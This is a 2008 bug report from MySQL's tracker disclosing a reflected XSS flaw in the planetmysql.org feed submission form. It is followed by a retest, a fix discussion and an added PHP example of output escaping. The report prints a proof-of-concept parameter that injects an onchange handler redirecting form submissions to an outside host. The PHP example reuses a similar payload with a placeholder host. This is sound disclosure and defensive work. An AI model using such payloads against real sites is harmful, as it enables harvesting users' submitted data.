Bug #35033 Planetmysql submission form vulnerable to non-persistent XSS
Submitted: 4 Mar 2008 13:25  Modified: 4 Mar 2008 16:39
Reporter: Roland Bouman
Status: Closed
Category: MySQL Websites: MySQLForge  Severity: S2 (Serious)
Version:  OS: Any
Assigned to:  CPU Architecture: Any

[4 Mar 2008 13:25] Roland Bouman
Description:
The page

http://www.planetmysql.org/newfeed.php

is vulnerable to XSS.

The parameters can be used to inject html/script and allow whoever is offering the link to place arbitrary content on the page. 

This is a security risk as the unsuspecting user will believe all content originates from a location that is trusted.

How to repeat:
POC:

http://www.planetmysql.org/newfeed.php?new_feed_url=http%3A%2F%2F&new_feed_language=&new_f...

Look at the parameter 

new_feed_author=%22%20onchange=%22this.form.action='http://www.yahoo.com/';%22/%3E%3Cspan%20id=%22

This inserts an onchange handler to the author field in the form. 
The onchange handler modifies the "action" attribute of the form.
When submitting the form you will be sending the form data to yahoo.com.

Of course you can put whatever you like in there. In this case this would compromise the submitters email address.

In a more insidious scenario, the hacker could inject a poll or a contest or even an update profile link or whatever and harvest data of a more sensitive nature.

Suggested fix:
Make sure that when *outputting* the parameters, the content is escaped using HTML escaping (htmlentities should do the trick)
[4 Mar 2008 14:21] Lenz Grimmer
Thanks for the report!
[4 Mar 2008 14:26] Lenz Grimmer
Roland, I committed a fix and updated the website. Can you please retest? Thanks!
[4 Mar 2008 14:39] Roland Bouman
I can still inject html.

The inputs look OK, but there is a 'helpful' message to inform me that the email address is invalid, and that reports back the invalid email address. I mean this one

<div class="feedcontent">
<h3>"Invalid email address '"/>'" 

etc

http://www.planetmysql.org/newfeed.php?new_feed_url=%27&new_feed_language=&new_feed_author...

My personal opinion is that the server side should check these things, obviously. But informing the user is more like a convenience feature that I would place at the client side where possible.

You can check for an email address using offline javascript, as you can use regular expression matches.

That said - I think it is acceptable to simply not report back the invalid email address.
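The following is an added example, not code from the report or from the planetmysql.org site. It models the two output sites the thread identifies (the echoed author field, and the "Invalid email address" notice that reflected the raw value after the first fix) and renders each without and with output escaping, plus the server-side validation and the "do not echo the value" variant the reporter proposes. All function and parameter names are assumed for illustration; the host in the constructed payload is a placeholder.

```php
<?php
// Added example, not the planetmysql.org code. Shows the author <input> and the
// "Invalid email address" notice rendered raw and then with output escaping.
// Function and parameter names are assumed for illustration.

// Escape untrusted text for an HTML body or a double/single-quoted attribute.
// ENT_QUOTES matters here because the injection point is an attribute value.
function h(string $untrusted): string
{
    return htmlspecialchars($untrusted, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// The author field as the form echoes it back. $fixed selects the escaped version.
function render_author_field(string $author, bool $fixed): string
{
    $value = $fixed ? h($author) : $author;
    return '<input type="text" name="new_feed_author" value="' . $value . '"/>';
}

// The validation notice. Unfixed: echoes the raw value (the second finding).
// Fixed: escapes it; with $echo_value = false, omits the value entirely.
function render_email_error(string $email, bool $fixed, bool $echo_value = true): string
{
    if (!$echo_value) {
        return '<div class="feedcontent"><h3>Invalid email address</h3></div>';
    }
    $value = $fixed ? h($email) : $email;
    return "<div class=\"feedcontent\"><h3>Invalid email address '" . $value . "'</h3></div>";
}

// Server-side check that runs regardless of any client-side convenience check.
function email_is_valid(string $email): bool
{
    return filter_var($email, FILTER_VALIDATE_EMAIL) !== false;
}

// Detect whether untrusted input introduced markup the template did not contain:
// after rendering, every '<', '"' and "'" must belong to the template itself.
function input_broke_out(string $template_with_empty_value, string $rendered): bool
{
    foreach (['<', '"', "'"] as $ch) {
        if (substr_count($rendered, $ch) !== substr_count($template_with_empty_value, $ch)) {
            return true;
        }
    }
    return false;
}

// Constructed input modelled on the report's payload (placeholder host).
$payload = '" onchange="this.form.action=\'http://example.invalid/\';"/><span id="';

foreach ([false, true] as $fixed) {
    $label  = $fixed ? 'escaped' : 'raw';
    $field  = render_author_field($payload, $fixed);
    $notice = render_email_error($payload, $fixed);
    echo "[$label] $field\n";
    echo "[$label] broke out of attribute: "
        . var_export(input_broke_out(render_author_field('', $fixed), $field), true) . "\n";
    echo "[$label] $notice\n";
    echo "[$label] broke out of notice: "
        . var_export(input_broke_out(render_email_error('', $fixed), $notice), true) . "\n";
}

// The reporter's alternative: reject server-side and do not reflect the value at all.
if (!email_is_valid($payload)) {
    echo render_email_error($payload, true, false) . "\n";
}
```

Run with `php example.php`: the raw renderings report `broke out: true` because the payload's quote closes the `value` attribute and its `<span` opens a new tag, while the escaped renderings report `false` because `"`, `'` and `<` have become `&quot;`, `&#039;` and `&lt;`. `htmlentities()` as suggested in the report works the same way for this purpose; `htmlspecialchars()` is the narrower call, and passing `ENT_QUOTES` also covers single-quoted attribute contexts such as the notice's `'...'` wrapper.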
[4 Mar 2008 16:39] Lenz Grimmer
Thanks for the feedback, I consider the case closed for now and remove the "private" flag from the report.